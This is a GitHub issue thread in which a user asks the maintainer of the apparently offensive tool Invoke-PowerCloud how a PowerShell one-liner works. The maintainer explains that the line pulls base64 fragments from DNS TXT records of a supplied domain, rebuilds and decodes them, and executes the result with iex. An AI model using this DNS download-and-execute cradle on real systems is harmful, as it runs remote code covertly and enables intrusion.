### ISSUE TITLE
Regard _ Assist on understand the core 

### ISSUE THREAD

**Issue by elagrija** [mantvydasb/Invoke-PowerCloud#2]
Hi Manty,

May i pls know the working of the following code.

ForEach-Object { $b64+=(nslookup -q=txt "$_.' + $Domain + '"' + ')[-1] }; iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace(''\t|"'',"")))))'

I have the following query on ..nslookup -q=txt "$_.' + $Domain + '"' + ')[-1]..

1. what is meant by [-1] in the end of the command.

**Comment by elagrija** [comment]
And also pls explain a liitle more on (($b64 -replace(''\t|"'',"")))))

**Comment by elagrija** [comment]
Thanks in advance

**Comment by mantvydasb** [comment]
Hey,
- ForEach-Object { $b64+=(nslookup -q=txt "$_.' + $Domain + '"' + ')[-1] }; iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace(''\t|"'',"")))))' -  this code retrieves the base64encoded DNS TXT record, rebuilds it, decodes and executes it.

$string[-1] means the same as $stirng[1] (which would mean the second character in the string), except that -1 takes the last character from  given list. See example:

PS H:\> "power"[0]; "power"[-1];
p
r

And also pls explain a liitle more on (($b64 -replace(''\t|"'',""))))) - this just cleans up tabs and extraneous quotes, so that the b64 does not contain those invalid characters.
